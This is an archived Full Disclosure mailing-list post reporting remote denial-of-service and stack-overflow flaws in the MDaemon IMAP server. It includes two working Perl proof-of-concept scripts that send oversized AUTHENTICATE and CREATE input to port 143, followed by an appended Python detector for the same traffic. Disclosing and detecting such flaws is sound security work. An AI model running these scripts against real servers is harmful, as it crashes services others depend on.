Full Disclosure mailing list archives
ALT-N MDaemon multiple vulnerabilities
From: kcope <kingcope () gmx net>
Date: Mon, 18 Jul 2005 20:24:09 +0200
Hello this is kcope, there are two remote vulnerabilities in the latest ALT-N MDaemon imapd product i don't know if any of them is exploitable .. the stack based buffer overflow seems promising, but it's not preauth so i didn't investigate it further.

1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap CREATE statement
---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like there's a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###
use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');
$a = "q" x 1000;
print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";

while (<$sock>) {
    print $_;
}
---snip---

---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');
$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;
print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
    print $_;
}
---snip---

-kcope
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
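
A defender-side check for the two cases in the post above, as an added example that is not part of kcope's message or ALT-N's code: it scans one client-to-server IMAP stream for oversized or malformed AUTHENTICATE continuation data and for oversized CREATE mailbox arguments. The size limits, the function name `inspect_client_stream` and the sample streams are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Assumed limits, not taken from the post; tune them per deployment.
MAX_AUTH_RESPONSE = 512  # bytes in one AUTHENTICATE continuation line
MAX_MAILBOX_NAME = 255   # bytes in a CREATE mailbox argument
# Client responses each SASL mechanism expects after the command line.
AUTH_RESPONSES = {b"CRAM-MD5": 1, b"LOGIN": 2}
AUTH_RE = re.compile(rb"^\S+ AUTHENTICATE (\S+)", re.I)
CREATE_RE = re.compile(rb"^\S+ CREATE (.*)$", re.I)
LITERAL_RE = re.compile(rb"^\{(\d+)\+?\}$")  # IMAP literal announcement, e.g. {500}


def inspect_client_stream(lines):
    """Return (line_number, reason) findings for one client-to-server stream."""
    findings = []
    mech, remaining = None, 0
    for number, raw in enumerate(lines, 1):
        line = raw.rstrip(b"\r\n")
        if remaining:  # this line answers a "+" challenge, it is not a command
            remaining = 0 if line == b"*" else remaining - 1
            if len(line) > MAX_AUTH_RESPONSE:
                findings.append((number, f"oversized {mech} response: {len(line)} bytes"))
            elif line != b"*":  # "*" cancels the exchange and is legal
                try:
                    base64.b64decode(line, validate=True)
                except (binascii.Error, ValueError):
                    findings.append((number, f"malformed base64 in {mech} response"))
            continue
        auth = AUTH_RE.match(line)
        if auth:
            mech = auth.group(1).upper().decode("ascii", "replace")
            remaining = AUTH_RESPONSES.get(auth.group(1).upper(), 1)
            continue
        create = CREATE_RE.match(line)
        if create:
            arg = create.group(1).strip()
            literal = LITERAL_RE.match(arg)  # only the announced size is checked
            size = int(literal.group(1)) if literal else len(arg.strip(b'"'))
            if size > MAX_MAILBOX_NAME:
                findings.append((number, f"oversized CREATE mailbox name: {size} bytes"))
    return findings


# Constructed client streams shaped like the two cases in the post.
AUTH_STREAM = [b"a001 AUTHENTICATE CRAM-MD5\r\n", b"q" * 1000 + b"\r\n", b"a002 NOOP\r\n"]
CREATE_STREAM = [b"a001 LOGIN username password\r\n",
                 b"a002 CREATE " + (b"a" * 49 + b"\\") * 10 + b"\r\n",
                 b"a003 CREATE INBOX/reports\r\n"]
```

The same function can run over reassembled port 143 client payloads from a capture or a proxy log; it sees only the client side, so it assumes the server issued the expected number of "+" challenges.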